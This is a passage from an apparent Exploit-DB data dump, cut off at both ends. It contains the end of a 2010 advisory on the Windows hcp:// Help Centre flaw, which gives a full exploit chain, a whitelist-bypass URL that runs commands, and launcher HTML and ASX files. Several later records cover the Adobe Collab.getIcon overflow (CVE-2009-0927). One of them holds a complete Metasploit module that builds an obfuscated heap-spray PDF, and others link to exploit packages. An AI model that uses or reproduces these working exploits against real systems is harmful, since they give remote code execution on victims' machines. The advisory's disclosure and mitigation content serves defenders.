4\r\n.text:010668A6 call HexToNum\r\n.text:010668AB or edi, eax\r\n.text:010668AD add esi, 0Ah ; account for number of bytes (not chars) consumed by the escape.\r\n.text:010668B0 jmp short FinishedEscape\r\n.text:010668B2\r\n.text:010668B2 NotUnicode: \r\n.text:010668B2 call HexToNum ; this is the same code, but for non-unicode sequences (e.g. %41, instead of %u0041)\r\n.text:010668B7 mov edi, eax\r\n.text:010668B9 movzx eax, word ptr [esi]\r\n.text:010668BC push eax\r\n.text:010668BD call HexToNum\r\n.text:010668C2 shl eax, 4\r\n.text:010668C5 or edi, eax\r\n.text:010668C7 add esi, 4 ; account for number of bytes (not chars) consumed by the escape.\r\n.text:010668CA\r\n.text:010668CA FinishedEscape:\r\n.text:010668CA test di, di\r\n.text:010668CD jz short loc_10668DA\r\n.text:010668CF\r\n.text:010668CF LiteralChar:\r\n.text:010668CF push edi ; append the final value to the normalised string using a std::string append.\r\n.text:010668D0 mov ecx, [ebp+unescaped]\r\n.text:010668D3 push 1\r\n.text:010668D5 call std::string::append\r\n.text:010668DA mov di, [esi] ; fetch the next input character.\r\n.text:010668DD test di, di ; have we reached the NUL terminator?\r\n.text:010668E0 jnz Unescape ; process next char.\r\n\r\nThis code seems sane, but an error exists due to how MPC::HexToNum() handles\r\nerror conditions, the relevant section of code is annotated below.\r\n\r\n.text:0102D32A mov edi, edi\r\n.text:0102D32C push ebp\r\n.text:0102D32D mov ebp, esp ; function prologue.\r\n.text:0102D32F mov eax, [ebp+arg_0] ; fetch the character to convert.\r\n.text:0102D332 cmp eax, '0'\r\n.text:0102D335 jl short CheckUppercase ; is it a digit?\r\n.text:0102D337 cmp eax, '9'\r\n.text:0102D33A jg short CheckUppercase\r\n.text:0102D33C add eax, 0FFFFFFD0h ; atoi(), probably written val - '0' and optimised by compiler.\r\n.text:0102D33F jmp short Complete \r\n.text:0102D341 CheckUppercase:\r\n.text:0102D341 cmp eax, 'A'\r\n.text:0102D344 jl short CheckLowercase ; is it an uppercase xdigit?\r\n.text:0102D346 cmp eax, 'F'\r\n.text:0102D349 jg short CheckLowercase\r\n.text:0102D34B add eax, 0FFFFFFC9h ; atoi()\r\n.text:0102D34E jmp short Complete \r\n.text:0102D350 CheckLowercase:\r\n.text:0102D350 cmp eax, 'a'\r\n.text:0102D353 jl short Invalid ; lowercase xdigit?\r\n.text:0102D355 cmp eax, 'f'\r\n.text:0102D358 jg short Invalid \r\n.text:0102D35A add eax, 0FFFFFFA9h ; atoi()\r\n.text:0102D35D jmp short Complete \r\n.text:0102D35F Invalid: \r\n.text:0102D35F or eax, 0FFFFFFFFh ; invalid character, return -1\r\n.text:0102D362 Complete: \r\n.text:0102D362 pop ebp\r\n.text:0102D363 retn 4\r\n\r\nThus, MPC::HTML::UrlUnescapeW() does not check the return code of\r\nMPC::HexToNum() as required, and therefore can be manipulated into appending\r\nunexpected garbage onto std::strings. This error may appear benign, but we can\r\nuse the miscalculations produced later in the code to evade the /fromhcp\r\nwhitelist.\r\n\r\nAssuming that we can access arbitrary help documents (full details of how the\r\nMPC:: error can be used to accomplish this will be explained below), we must\r\nidentify a document that can be controlled purely from the URL used to access it.\r\n\r\nAfter browsing the documents available in a typical installation, the author\r\nconcluded the only way to do this would be a cross site scripting error. After\r\nsome careful searching, a candidate was discovered:\r\n\r\nhcp://system/sysinfo/sysinfomain.htm?svr=<h1>test</h1>\r\n\r\nThis document is available in a default installation, and due to insufficient\r\nescaping in GetServerName() from sysinfo/commonFunc.js, the page is vulnerable\r\nto a DOM-type XSS. However, the escaping routine will abort encoding if characters\r\nsuch as '=' or '\"' or others are specified. \r\n\r\nIt's not immediately obvious that this error is still exploitable, simple\r\ntricks like <img src=bad onerror=code> don't apply, and <script>code</script>\r\nisn't helpful as the code isn't evaluated again. In situations like this, the\r\nbest course of action is to harass lcamtuf until he gives you the solution,\r\nwhich of course his encyclopaedic knowledge of browser security quirks produced\r\nimmediately.\r\n\r\n<script defer>code</script>\r\n\r\nThe defer property is an IE-ism which solves the problem, documented by\r\nMicrosoft here http://msdn.microsoft.com/en-us/library/ms533719%28VS.85%29.aspx.\r\nNow that we are armed with knowledge of this trick, because these help\r\ndocuments are in a privileged zone, we can simply execute commands.\r\n\r\nYou can test this with a command like so (assuming a recent IE):\r\n\r\nC:\\> ver\r\nMicrosoft Windows XP [Version 5.1.2600]\r\nC:\\> c:\\windows\\pchealth\\helpctr\\binaries\\helpctr.exe -url \"hcp://system/sysinfo/sysinfomain.htm?svr=<script defer>eval(unescape('Run%28%22calc.exe%22%29'))</script>\"\r\nC:\\>\r\n\r\nWhile this is fun, this isn't a vulnerability unless an untrusted third party\r\ncan force you to access it. Testing suggests that by default, accessing an\r\nhcp:// URL from within Internet Explorer >= 8, Firefox, Chrome (and presumably\r\nother browsers) will result in a prompt. Although most users will click through\r\nthis prompt (perfectly reasonable, protocol handlers are intended to be safe),\r\nit's not a particularly exciting attack.\r\n\r\nI've found a way to avoid the prompt in a default Windows XP installation in all\r\nmajor browsers, The solution is to invoke the protocol handler from within an\r\n<iframe> in an ASX HtmlView element. There are probably other ways.\r\n\r\nhttp://en.wikipedia.org/wiki/Advanced_Stream_Redirector\r\n\r\nThe version of Windows Media Player that is available by default in Windows XP\r\nis WMP9, which installs an NPAPI and ActiveX plugin to render windows media\r\ncontent. Later versions also can be used, with some minor complications.\r\n\r\nThus, the attack will look like this:\r\n\r\n$ cat simple.asx \r\n<ASX VERSION=\"3.0\">\r\n<PARAM name=\"HTMLView\" value=\"http://lock.cmpxchg8b.com/b10a58b75029f79b5f93f4add3ddf992/starthelp.html\"/>\r\n<ENTRY>\r\n <REF href=\"http://lock.cmpxchg8b.com/b10a58b75029f79b5f93f4add3ddf992/bug-vs-feature.jpg\"/>\r\n</ENTRY>\r\n</ASX>\r\n\r\nWhere starthelp.html contains something like:\r\n\r\n$ cat starthelp.html \r\n<iframe src=\"hcp://...\">\r\n\r\nForcing a user to read an .ASX file can be achieved in a cross-browser manner like so:\r\n\r\n$ cat launchurl.html \r\n<html>\r\n<head><title>Testing HCP</title></head>\r\n<body>\r\n <h1>OK</h1>\r\n <script>\r\n // HCP:// Vulnerability, Tavis Ormandy, June 2010.\r\n var asx = \"http://lock.cmpxchg8b.com/b10a58b75029f79b5f93f4add3ddf992/simple.asx\";\r\n\r\n if (window.navigator.appName == \"Microsoft Internet Explorer\") {\r\n // Internet Explorer\r\n var o = document.createElement(\"OBJECT\");\r\n o.setAttribute(\"classid\", \"clsid:6BF52A52-394A-11d3-B153-00C04F79FAA6\");\r\n o.openPlayer(asx);\r\n } else {\r\n // Mozilla, Chrome, Etc.\r\n var o = document.createElement(\"IFRAME\");\r\n o.setAttribute(\"src\", asx);\r\n document.body.appendChild(o);\r\n }\r\n </script>\r\n</body>\r\n</html>\r\n\r\nTherefore, we have the following interactions between multiple complex systems\r\nchained together:\r\n\r\n- From an html page, email, document, or other application force a user to\r\n fetch a .ASX file containing an HtmlView element.\r\n- From the HtmlView element, invoke the hcp protocol handler that would normally\r\n require confirmation.\r\n- From the HCP Protocol handler, bypass the /fromhcp whitelist by using the\r\n string miscalculations caused by failing to check the return code of\r\n MPC::HexToNum().\r\n- Once the whitelist has been defeated, invoke the Help document with a known\r\n DOM XSS due to GetServerName() insufficient escaping.\r\n- Use the defer property of a script tag to execute script in a privileged zone\r\n even after the page has been rendered.\r\n- Invoke an arbitrary command using the wscript.shell object.\r\n\r\nFiguring out how to use the MCP::HexToNum() error to defeat the /fromhcp\r\nwhitelist took some analysis, but the result looks like the following.\r\n\r\nhcp://services/search?query=anything&topic=hcp://system/sysinfo/sysinfomain.htm%\r\nA%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%\r\n%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A\r\n%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%\r\nA%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A..%5C..%5Csysinfomain.htm%u003fsvr=%3\r\nCscript%20defer%3Eeval%28unescape%28%27Run%2528%2522calc.exe%2522%2529%27%29%29%\r\n3C/script%3E\r\n\r\n--------------------\r\nAffected Software\r\n------------------------\r\n\r\nAt least Microsoft Windows XP, and Windows Server 2003 are affected. The attack\r\nis enhanced against IE >= 8 and other major browsers if Windows Media Player is\r\navailable, but an installation is still vulnerable without it.\r\n\r\nMachines running version of IE less than 8 are, as usual, in even more trouble.\r\n\r\nIn general, choice of browser, mail client or whatever is not relevant, they\r\nare all equally vulnerable.\r\n\r\n--------------------\r\nConsequences\r\n-----------------------\r\n\r\nUpon successful exploitation, a remote attacker is able to execute arbitrary\r\ncommands with the privileges of the current user.\r\n\r\nI've prepared a demonstration for a typical Windows XP installation with\r\nInternet Explorer 8, and the default Windows Media Player 9.\r\n\r\nhttp://lock.cmpxchg8b.com/b10a58b75029f79b5f93f4add3ddf992/launchurl.html\r\n\r\nIn IE7 on Windows XP, just visiting this URL should be sufficient:\r\n\r\nhttp://lock.cmpxchg8b.com/b10a58b75029f79b5f93f4add3ddf992/starthelp.html\r\n\r\nSome minor modifications will be required to target other configurations, this\r\nis simply an attempt to demonstrate the problem. I'm sure the smart guys at\r\nmetasploit will work on designing reliable attacks, as security professionals\r\nrequire these to do their jobs.\r\n\r\nAdditionally, my demonstration is not intended to be stealthy, a real\r\nattack would barely be noticable to the victim. Perhaps the only unavoidable\r\nsignal would be the momentary appearance of the Help Centre window before the\r\nattacker hides it. There are multiple trivial techniques that can be used to\r\naccomplish this.\r\n\r\nBrowsers are useful to demonstrate the problem, but there are certainly other\r\nattack vectors, such as MUAs, documents, etc. Protocol handlers are designed to\r\nbe used across applications.\r\n\r\n-------------------\r\nMitigation\r\n-----------------------\r\n\r\nIf you believe you may be affected, you should consider applying one of the\r\nworkarounds described below.\r\n\r\nFew users rely on Help Centre urls, it is safe to temporarily disable them\r\nby removing HKCR\\HCP\\shell\\open. This modification can be deployed easily using\r\nGPOs. For more information on Group Policy, see Microsoft's Group Policy site,\r\nhere\r\n\r\nhttp://technet.microsoft.com/en-us/windowsserver/bb310732.aspx\r\n\r\nA few caveats, \r\n\r\n * I am aware that some support technicians rely on the Remote Assistance\r\n tool provided by the Help Center application using shortcuts like\r\n \"explorer.exe hcp://CN=Microsoft%20Corporation,L=Re...\". You can continue\r\n to use this technique by substituting \"explorer.exe hcp://...\" for\r\n \"helpctr.exe /url hcp://...\", without relying on the protocol handler.\r\n\r\n * One or two links in explorer, such as selecting \"Help\" from the Control\r\n Panel category view, may no longer function. If this concerns you, it is\r\n possible to gracefully degrade by replacing the protocol handler with a\r\n command to open a static intranet support page, e.g.\r\n \"chrome.exe http://techsupport.intranet\".\r\n\r\n * As always, if you do not use this feature, consider permanently disabling\r\n it in order to reduce attack surface. Historically, disabling unused\r\n protocol handlers has always proven to be a wise investment in security. \r\n\r\nIn the unlikely event that you heavily rely on the use of hcp://, I have\r\ncreated an unofficial (temporary) hotfix. You may use it under the terms of\r\nthe GNU General Public License, version 2 or later. Of course, you should only\r\nuse it as a last resort, carefully test the patch and make sure you understand\r\nwhat it does (full source code is included). It may be necessary to modify it\r\nto fit your needs.\r\n\r\nThe package is availble for x86 here:\r\n\r\nhttp://lock.cmpxchg8b.com/b10a58b75029f79b5f93f4add3ddf992/hcphotfix.zip\r\n\r\n[ NOTE: Please avoid linking to this file out of context, it is intended for\r\n consideration as a potential mitigation by experienced administrators,\r\n and is not suitable for consumption by end-users ]\r\n\r\nThe hotfix intercepts helpctr.exe invokations, and patches MPC::HexToNum() to\r\nreturn zero on error, rather than -1. Nothing is changed on disk, and it can be\r\nsafely removed at anytime. Of course, the result of an invalid unescape is still\r\nincorrect, but this specific vulnerability should be rendered inert. I would be\r\ngreatful if the community could contribute bugfixes, testing, an x64 port, and\r\nso on. Once information is in the open, we can all collaborate on our\r\ncollective security.\r\n\r\nSome clarifications,\r\n\r\n * Fixing the XSS is not a solution, the root cause is the whitelist\r\n evasion, any mitigation that does not address this is simply papering\r\n over the issue. An army of researchers that specialise in XSS exists, and\r\n i'm sure they will turn their attention to help documents once they\r\n realise their value. Assume more will be discovered.\r\n\r\n * That said, if you are an XSS expert, examples in whitelisted pages\r\n (/services/index, /services/search, etc.) would be useful, your skills\r\n could be helpful making this important software safe.\r\n\r\n * Removing Windows Media player is not a solution, it simply makes a fun\r\n demo for IE8 and other modern browsers.\r\n\r\nFinally, you should take this opportunity to disable all browser plugins and\r\nSFS ActiveX controls that are not regularly used. End users can do this\r\nthemselves in Google Chrome by viewing about:plugins and disabling the plugins\r\nthat are not required. In Mozilla Firefox, use the Tools->Add-ons->Plugins\r\ninterface.\r\n\r\n-------------------\r\nSolution\r\n-----------------------\r\n\r\nMicrosoft was informed about this vulnerability on 5-Jun-2010, and they\r\nconfirmed receipt of my report on the same day.\r\n\r\nProtocol handlers are a popular source of vulnerabilities, and hcp:// itself\r\nhas been the target of attacks multiple times in the past. I've concluded that\r\nthere's a significant possibility that attackers have studied this component,\r\nand releasing this information rapidly is in the best interest of security.\r\n\r\nThose of you with large support contracts are encouraged to tell your support\r\nrepresentatives that you would like to see Microsoft invest in developing\r\nprocesses for faster responses to external security reports.\r\n\r\n-------------------\r\nCredit\r\n-----------------------\r\n\r\nThis bug was discovered by Tavis Ormandy.\r\n\r\n-------------------\r\nGreetz\r\n-----------------------\r\n\r\nGreetz to Neel, Mark, Redpig, Spoonm, Skylined, asiraP, LiquidK, ScaryBeasts,\r\nHawkes, Jagger, and all my other pimp colleagues.\r\n\r\nSpecial thanks to lcamtuf for his assistance with the deferred execution\r\nproblem. You should read his Browser Security Handbook if you need to\r\nunderstand how web browser security /really/ works.\r\n\r\nhttp://code.google.com/p/browsersec/wiki/Main\r\n\r\nA colleague is organising a conference in Lucerne, Switzerland. He would really\r\nappreciate interesting papers from security people who want to talk about\r\ntheir research (travel, hotel, etc. covered).\r\n\r\nhttps://www.hashdays.ch/\r\n\r\n-------------------\r\nNotes\r\n-----------------------\r\n\r\nI would like to point out that if I had reported the MPC::HexToNum() issue\r\nwithout a working exploit, I would have been ignored.\r\n\r\nWithout access to extremely smart colleagues, I would likely have given up,\r\nleaving you vulnerable to attack from those who just want root on your network\r\nand do not care about disclosure policies.\r\n\r\nThis is another example of the problems with bug secrecy (or in PR speak,\r\n\"responsible disclosure\"), those of us who work hard to keep networks safe are\r\nforced to work in isolation without the open collaboration with our peers that\r\nwe need, especially in complex cases like this, where creative thinking and\r\ninput from experts in multiple disciplines is required to join the dots.\r\n\r\nA good place to start researching full disclosure would be this accessible\r\nand insightful essay by Bruce Schneier.\r\n\r\nhttp://www.schneier.com/essay-146.html\r\n\r\nHis balanced coverage of the debate is also available in this essay.\r\n\r\nhttp://www.schneier.com/crypto-gram-0111.html#1\r\n\r\nFinally, a reminder that this document represents my own work and opinions, I\r\ndo not speak for or represent anyone but myself.\r\n\r\n-------------------\r\nReferences\r\n-----------------------\r\n\r\nhcp:// has been broken a few times over the years, for example:\r\n\r\n- http://seclists.org/bugtraq/2002/Aug/225, Delete arbitrary files using Help and Support Center\r\n- http://www.microsoft.com/technet/security/bulletin/ms03-044.mspx, HCP memory corruption by Dave Litchfield.\r\n\r\nThe current design is actually pretty sound, I'm sure Microsoft are\r\ndissapointed they missed this flaw. In their defense, I think there's a good\r\nchance I would have also missed this in code review.\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/13808/"}, {"lastseen": "2016-02-02T00:14:37", "description": "Adobe Collab.getIcon() Buffer Overflow. CVE-2009-0927. Local exploit for windows platform", "published": "2010-04-30T00:00:00", "type": "exploitdb", "title": "Adobe Collab.getIcon Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0927"], "modified": "2010-04-30T00:00:00", "id": "EDB-ID:16606", "href": "https://www.exploit-db.com/exploits/16606/", "sourceData": "##\r\n# $Id: adobe_geticon.rb 9179 2010-04-30 08:40:19Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\nrequire 'zlib'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GoodRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpServer::HTML\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Adobe Collab.getIcon() Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a buffer overflow in Adobe Reader and Adobe Acrobat.\r\n\t\t\t\tAffected versions include < 7.1.1, < 8.1.3, and < 9.1. By creating a specially\r\n\t\t\t\tcrafted pdf that a contains malformed Collab.getIcon() call, an attacker may\r\n\t\t\t\tbe able to execute arbitrary code.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'MC',\r\n\t\t\t\t\t'Didier Stevens <didier.stevens[at]gmail.com>',\r\n\t\t\t\t\t'jduck'\r\n\t\t\t\t],\r\n\t\t\t'Version' => '$Revision: 9179 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2009-0927' ],\r\n\t\t\t\t\t[ 'OSVDB', '53647' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-09-014/' ],\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1024,\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t# test results (on Windows XP SP3)\r\n\t\t\t\t\t# reader 7.0.5 - no trigger\r\n\t\t\t\t\t# reader 7.0.8 - no trigger\r\n\t\t\t\t\t# reader 7.0.9 - no trigger\r\n\t\t\t\t\t# reader 7.1.0 - no trigger\r\n\t\t\t\t\t# reader 7.1.1 - reported not vulnerable\r\n\t\t\t\t\t# reader 8.0.0 - works\r\n\t\t\t\t\t# reader 8.1.2 - works\r\n\t\t\t\t\t# reader 8.1.3 - reported not vulnerable\r\n\t\t\t\t\t# reader 9.0.0 - works\r\n\t\t\t\t\t# reader 9.1.0 - reported not vulnerable\r\n\t\t\t\t\t[ 'Adobe Reader Universal (JS Heap Spray)', { 'Ret' => '' } ],\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Mar 24 2009',\r\n\t\t\t'DefaultTarget' => 0))\r\n\tend\r\n\r\n\tdef autofilter\r\n\t\tfalse\r\n\tend\r\n\r\n\tdef check_dependencies\r\n\t\tuse_zlib\r\n\tend\r\n\r\n\tdef on_request_uri(cli, request)\r\n\t\treturn if ((p = regenerate_payload(cli)) == nil)\r\n\t\t# Encode the shellcode.\r\n\t\tshellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))\r\n\r\n\t\t# Make some nops\r\n\t\tnops = Rex::Text.to_unescape(make_nops(4))\r\n\r\n\t\t# Randomize variables\r\n\t\trand1 = rand_text_alpha(rand(100) + 1)\r\n\t\trand2 = rand_text_alpha(rand(100) + 1)\r\n\t\trand3 = rand_text_alpha(rand(100) + 1)\r\n\t\trand4 = rand_text_alpha(rand(100) + 1)\r\n\t\trand5 = rand_text_alpha(rand(100) + 1)\r\n\t\trand6 = rand_text_alpha(rand(100) + 1)\r\n\t\trand7 = rand_text_alpha(rand(100) + 1)\r\n\t\trand8 = rand_text_alpha(rand(100) + 1)\r\n\t\trand9 = rand_text_alpha(rand(100) + 1)\r\n\t\trand10 = rand_text_alpha(rand(100) + 1)\r\n\t\trand11 = rand_text_alpha(rand(100) + 1)\r\n\t\trand12 = rand_text_alpha(rand(100) + 1)\r\n\r\n\t\tscript = %Q|\r\n\t\tvar #{rand1} = unescape(\"#{shellcode}\");\r\n\t\tvar #{rand2} =\"\";\r\n\t\tfor (#{rand3}=128;#{rand3}>=0;--#{rand3}) #{rand2} += unescape(\"#{nops}\");\r\n\t\t#{rand4} = #{rand2} + #{rand1};\r\n\t\t#{rand5} = unescape(\"#{nops}\");\r\n\t\t#{rand6} = 20;\r\n\t\t#{rand7} = #{rand6}+#{rand4}.length\r\n\t\twhile (#{rand5}.length<#{rand7}) #{rand5}+=#{rand5};\r\n\t\t#{rand8} = #{rand5}.substring(0, #{rand7});\r\n\t\t#{rand9} = #{rand5}.substring(0, #{rand5}.length-#{rand7});\r\n\t\twhile(#{rand9}.length+#{rand7} < 0x40000) #{rand9} = #{rand9}+#{rand9}+#{rand8};\r\n\t\t#{rand10} = new Array();\r\n\t\tfor (#{rand11}=0;#{rand11}<1450;#{rand11}++) #{rand10}[#{rand11}] = #{rand9} + #{rand4};\r\n\t\tvar #{rand12} = unescape(\"%0a\");\r\n\t\twhile(#{rand12}.length < 0x4000) #{rand12}+=#{rand12};\r\n\t\t#{rand12} = \"N.\"+#{rand12};\r\n\t\tCollab.getIcon(#{rand12});\r\n\t\t\t\t\t|\r\n\r\n\t\t# Create the pdf\r\n\t\tpdf = make_pdf(script)\r\n\r\n\t\tprint_status(\"Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...\")\r\n\r\n\t\tsend_response(cli, pdf, { 'Content-Type' => 'application/pdf' })\r\n\r\n\t\thandler(cli)\r\n\tend\r\n\r\n\tdef RandomNonASCIIString(count)\r\n\t\tresult = \"\"\r\n\t\tcount.times do\r\n\t\t\tresult << (rand(128) + 128).chr\r\n\t\tend\r\n\t\tresult\r\n\tend\r\n\r\n\tdef ioDef(id)\r\n\t\t\"%d 0 obj\" % id\r\n\tend\r\n\r\n\tdef ioRef(id)\r\n\t\t\"%d 0 R\" % id\r\n\tend\r\n\r\n\t#http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/\r\n\tdef nObfu(str)\r\n\t\tresult = \"\"\r\n\t\tstr.scan(/./u) do |c|\r\n\t\t\tif rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'\r\n\t\t\t\tresult << \"#%x\" % c.unpack(\"C*\")[0]\r\n\t\t\telse\r\n\t\t\t\tresult << c\r\n\t\t\tend\r\n\t\tend\r\n\t\tresult\r\n\tend\r\n\r\n\tdef ASCIIHexWhitespaceEncode(str)\r\n\t\tresult = \"\"\r\n\t\twhitespace = \"\"\r\n\t\tstr.each_byte do |b|\r\n\t\t\tresult << whitespace << \"%02x\" % b\r\n\t\t\twhitespace = \" \" * (rand(3) + 1)\r\n\t\tend\r\n\t\tresult << \">\"\r\n\tend\r\n\r\n\tdef make_pdf(js)\r\n\r\n\t\txref = []\r\n\t\teol = \"\\x0d\\x0a\"\r\n\t\tendobj = \"endobj\" << eol\r\n\r\n\t\tpdf = \"%PDF-1.5\" << eol\r\n\t\tpdf << \"%\" << RandomNonASCIIString(4) << eol\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(1) << nObfu(\"<</Type/Catalog/Outlines \") << ioRef(2) << nObfu(\"/Pages \") << ioRef(3) << nObfu(\"/OpenAction \") << ioRef(5) << \">>\" << endobj\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(2) << nObfu(\"<</Type/Outlines/Count 0>>\") << endobj\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(3) << nObfu(\"<</Type/Pages/Kids[\") << ioRef(4) << nObfu(\"]/Count 1>>\") << endobj\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(4) << nObfu(\"<</Type/Page/Parent \") << ioRef(3) << nObfu(\"/MediaBox[0 0 612 792]>>\") << endobj\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(5) << nObfu(\"<</Type/Action/S/JavaScript/JS \") + ioRef(6) + \">>\" << endobj\r\n\t\txref << pdf.length\r\n\t\tcompressed = Zlib::Deflate.deflate(ASCIIHexWhitespaceEncode(js))\r\n\t\tpdf << ioDef(6) << nObfu(\"<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>\" % compressed.length) << eol\r\n\t\tpdf << \"stream\" << eol\r\n\t\tpdf << compressed << eol\r\n\t\tpdf << \"endstream\" << eol\r\n\t\tpdf << endobj\r\n\t\txrefPosition = pdf.length\r\n\t\tpdf << \"xref\" << eol\r\n\t\tpdf << \"0 %d\" % (xref.length + 1) << eol\r\n\t\tpdf << \"0000000000 65535 f\" << eol\r\n\t\txref.each do |index|\r\n\t\t\tpdf << \"%010d 00000 n\" % index << eol\r\n\t\tend\r\n\t\tpdf << \"trailer\" << nObfu(\"<</Size %d/Root \" % (xref.length + 1)) << ioRef(1) << \">>\" << eol\r\n\t\tpdf << \"startxref\" << eol\r\n\t\tpdf << xrefPosition.to_s() << eol\r\n\t\tpdf << \"%%EOF\" << eol\r\n\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16606/"}, {"lastseen": "2016-02-01T10:54:49", "description": "Adobe Acrobat/Reader < 7.1.1/8.1.3/9.1 Collab getIcon Universal Exploit. Local exploit for windows platform", "published": "2009-09-03T00:00:00", "type": "exploitdb", "title": "Adobe Acrobat/Reader < 7.1.1/8.1.3/9.1 - Collab getIcon Universal Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0927"], "modified": "2009-09-03T00:00:00", "id": "EDB-ID:9579", "href": "https://www.exploit-db.com/exploits/9579/", "sourceData": "#!/usr/bin/env python\r\n#\r\n# *** Acrobat Reader - Collab getIcon universal exploiter ***\r\n# evil_pdf.py, tested on Operating Systems:\r\n# Windows XP SP3 English/French\r\n# Windows 2003 SP2 English\r\n# with Application versions:\r\n# Adobe Reader 9.0.0/8.1.2 English/French\r\n# Test methods:\r\n# Standalone PDF, embedded PDF in Firefox 3.0.13 and Internet Explorer 7\r\n# 24/06/2009 - Created by Ivan Rodriguez Almuina (kralor). All rights reserved.\r\n# [Coromputer] raised from the ashes.\r\n#\r\n\r\nhttp://www.coromputer.net/CVE-2009-0927_package.zip\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9579.zip (2009-CVE-2009-0927_package.zip)\r\n\r\n# milw0rm.com [2009-09-03]\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/9579/"}, {"lastseen": "2016-02-01T07:43:15", "description": "Adobe Acrobat Reader 8.1.2 \u2013 9.0 getIcon() Memory Corruption Exploit. CVE-2009-0927. Local exploit for windows platform", "published": "2009-05-04T00:00:00", "type": "exploitdb", "title": "Adobe Acrobat Reader 8.1.2 - 9.0 - getIcon Memory Corruption Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0927"], "modified": "2009-05-04T00:00:00", "id": "EDB-ID:8595", "href": "https://www.exploit-db.com/exploits/8595/", "sourceData": "Affected Version : Acrobat Reader 8.1.2 - 9.0\r\nVendor Patch : http://www.adobe.com/support/security/bulletins/apsb09-04.html\r\nTested On : XP SP2 / SP3\r\n\r\nfrom ZDI : http://www.zerodayinitiative.com/advisories/ZDI-09-014/\r\n\r\nThis vulnerability allows remote attackers to execute arbitrary code on vulnerable installations\r\nof Adobe Acrobat and Adobe Reader. User interaction is required in that a user must visit a\r\nmalicious web site or open a malicious file.The specific flaw exists when processing malicious\r\nJavaScript contained in a PDF document. When supplying a specially crafted argument to the getIcon()\r\nmethod of a Collab object, proper bounds checking is not performed resulting in a stack overflow.\r\nIf successfully exploited full control of the affected machine running under the credentials of the\r\ncurrently logged in user can be achieved.\r\n\r\nThis vulnerability was discovered by:\r\n\r\nTenable Network Security (there is a man named Nicolas Pouvesle and we know == > he has lots of exploitation method ; ))\r\n\r\nExploit By : www.Abysssec.com\r\n\r\nnote : this exploit is just for educational purpose so shellcode will execute calc if you want other shellcode change shellcode .\r\n\r\nExploit Link : http://abysssec.com/Adobe.Collab.getIcon().pdf\r\nMirror Link : https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/8595.pdf (2009-Adobe.Collab.getIcon.pdf)\r\n\r\n# milw0rm.com [2009-05-04]\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/8595/"}, {"lastseen": "2016-02-02T06:15:21", "description": "Adobe Collab.getIcon() Buffer Overflow. CVE-2009-0927. Local exploit for windows platform", "published": "2010-09-25T00:00:00", "type": "exploitdb", "title": "Adobe Collab.getIcon Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0927"], "modified": "2010-09-25T00:00:00", "id": "EDB-ID:16681", "href": "https://www.exploit-db.com/exploits/16681/", "sourceData": "##\r\n# $Id: adobe_geticon.rb 10477 2010-09-25 11:59:02Z mc $\r\n##\r\n\r\n##\r\n# This file is part of 